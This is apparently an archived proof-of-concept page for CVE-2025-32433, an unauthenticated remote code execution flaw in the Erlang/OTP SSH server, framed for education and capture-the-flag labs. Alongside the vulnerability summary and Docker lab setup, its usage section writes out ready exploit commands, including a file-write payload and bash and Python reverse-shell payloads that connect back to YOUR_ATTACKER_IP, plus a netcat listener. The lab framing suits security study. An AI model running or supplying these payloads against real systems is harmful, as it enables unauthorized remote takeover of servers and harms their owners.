Associated Vulnerability
Title:Erlang/OTP SSH Vulnerable to Pre-Authentication RCE (CVE-2025-32433)Description:Erlang/OTP is a set of libraries for the Erlang programming language. Prior to versions OTP-27.3.3, OTP-26.2.5.11, and OTP-25.3.2.20, a SSH server may allow an attacker to perform unauthenticated remote code execution (RCE). By exploiting a flaw in SSH protocol message handling, a malicious actor could gain unauthorized access to affected systems and execute arbitrary commands without valid credentials. This issue is patched in versions OTP-27.3.3, OTP-26.2.5.11, and OTP-25.3.2.20. A temporary workaround involves disabling the SSH server or to prevent access via firewall rules.
Description
CVE-2025-32433 PoC: Unauthenticated Remote Code Execution (RCE) in Erlang/OTP SSH. Includes a vulnerable Docker environment and an interactive Python exploit script for ethical hacking & CTF challenges.
Readme
# CVE-2025-32433: Erlang/OTP SSH Unauthenticated RCE PoC
This repository contains a Proof-of-Concept (PoC) for CVE-2025-32433, a critical unauthenticated Remote Code Execution (RCE) vulnerability affecting the SSH server implementation in Erlang/Open Telecom Platform (OTP). This PoC is designed for educational purposes, security research, and Capture The Flag (CTF) challenges.
> ### ⚠️ Disclaimer - For Educational & Ethical Use Only ⚠️
> This PoC is provided strictly for educational and ethical hacking purposes. It is intended for use in controlled environments, such as isolated virtual machines or CTF platforms, where you have explicit permission to perform security testing.
>
> **DO NOT** use this PoC against any system you do not own or have explicit, written authorization to test. Unauthorized access or exploitation of computer systems is illegal and unethical. The author and maintainers of this repository are not responsible for any misuse or damage caused by this code.
---
### 📊 Vulnerability Overview
| Attribute | Details |
| :--- | :--- |
| **CVE ID** | `CVE-2025-32433` |
| **Vulnerability Type** | Unauthenticated Remote Code Execution (RCE) |
| **CVSS v3.1 Score** | `10.0` (Critical) |
| **Affected Software** | Erlang/OTP SSH server (`ssh`) |
| **Affected Versions** | OTP-27.3.2 and earlier<br>OTP-26.2.5.10 and earlier<br>OTP-25.3.2.19 and earlier<br>Versions from OTP 17.0 and older |
| **Patched Versions** | `OTP-27.3.3`, `OTP-26.2.5.11`, `OTP-25.3.2.20` |
### Technical Details
The vulnerability lies in how the Erlang/OTP SSH server processes SSH protocol messages during the pre-authentication phase. Specifically, the server fails to properly enforce the SSH protocol sequence, allowing a remote, unauthenticated attacker to send crafted `SSH_MSG_CHANNEL_OPEN` and `SSH_MSG_CHANNEL_REQUEST` messages. This enables the attacker to open a session channel and execute arbitrary Erlang commands (which can, in turn, execute system commands) without providing valid credentials. If the SSH daemon runs with elevated privileges (e.g., as `root`), successful exploitation can lead to full system compromise.
---
### 🛠️ Setup: Building the Vulnerable Environment (Docker)
The easiest way to set up a vulnerable Erlang/OTP SSH server is by using the provided `Dockerfile`.
1. **Clone this repository:**
```bash
git clone https://github.com/NiteeshPujari/CVE-2025-32433-PoC.git
cd CVE-2025-32433-PoC
```
2. **Build the Docker image:**
This command compiles a vulnerable version of Erlang/OTP (`OTP-26.2.5.10`) and configures the SSH server.
```bash
docker build -t erlang-ssh-vulnerable .
```
3. **Run the vulnerable server container:**
This starts the Erlang/OTP SSH server in the background, listening on port `2222`.
```bash
docker run -d --name erlang-ssh-target -p 2222:2222 erlang-ssh-vulnerable
```
* `-d`: Runs the container in detached mode.
* `--name erlang-ssh-target`: Assigns a name to the container for easy management.
* `-p 2222:2222`: Maps host port `2222` to container port `2222`.
4. **Verify the container is running:**
```bash
docker ps
```
---
### 🚀 Usage: Running the PoC Script
The `cve_2025_32433_exploit.py` script can be run interactively or with command-line arguments.
#### Interactive Mode
If you run the script without arguments, it will prompt you for the necessary information.
1. **Ensure the vulnerable Docker container is running.**
2. **Run the Python PoC script:**
```bash
python3 cve_2025_32433_exploit.py
```
3. **Follow the interactive prompts:**
The script will ask for:
* **Target IP address:** (e.g., `127.0.0.1` if targeting Docker on the same host).
* **Target port:** (e.g., `2222`).
* **Command to execute:** (Leave blank for the default test command).
#### Example 1: Test RCE by Creating a File
This is the default behavior if you leave the command prompt blank in interactive mode. It creates a file `/tmp/note.txt` on the target.
1. **Run the exploit:**
```bash
python3 cve_2025_32433_exploit.py --target-ip 127.0.0.1 --target-port 2222 --command 'file:write_file("/tmp/note.txt", "Exploit Ran!").'
```
2. **Verify the file was created on the target:**
```bash
docker exec -it erlang-ssh-target cat /tmp/note.txt
```
You should see the output: `Exploit Ran!`
#### Example 2: Getting a Reverse Shell
To get a reverse shell, you must provide a payload that connects back to a listener on your machine.
1. **Start a Netcat listener** on your attacking machine (e.g., Kali Linux) on your chosen port.
```bash
nc -lvnp 4444
```
> **Important:** Ensure your firewall (e.g., `ufw`) on your attacking machine allows inbound connections on this port.
> `sudo ufw allow 4444/tcp`
2. **Run the PoC script** with the reverse shell payload. Replace `YOUR_ATTACKER_IP` with your machine's IP address.
* **Bash Reverse Shell:**
```bash
python3 cve_2025_32433_exploit.py --target-ip 127.0.0.1 --target-port 2222 --command 'os:cmd("bash -i >& /dev/tcp/YOUR_ATTACKER_IP/4444 0>&1").'
```
* **Python Reverse Shell (often more reliable):**
```bash
python3 cve_2025_32433_exploit.py --target-ip 127.0.0.1 --target-port 2222 --command 'os:cmd("python3 -c ''import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"YOUR_ATTACKER_IP\",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/bash\",\"-i\"]);''").'
```
3. Check your Netcat listener. You should receive a connection and have a shell on the target container.
---
### 🧹 Cleanup
To stop and remove the Docker container and image:
```bash
# Stop and remove the container
docker stop erlang-ssh-target
docker rm erlang-ssh-target
# Optional: remove the image as well
docker rmi erlang-ssh-vulnerable
File Snapshot
[4.0K] /data/pocs/33b0c61a64e17d8a715a9cf02dcaf34c2c38b4a3
├── [ 13K] cve_2025_32433_exploit.py
├── [ 886] Dockerfile
├── [5.9K] README.md
└── [ 675] ssh_server.erl
0 directories, 4 files
Remarks
1. It is advised to access via the original source first.
2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →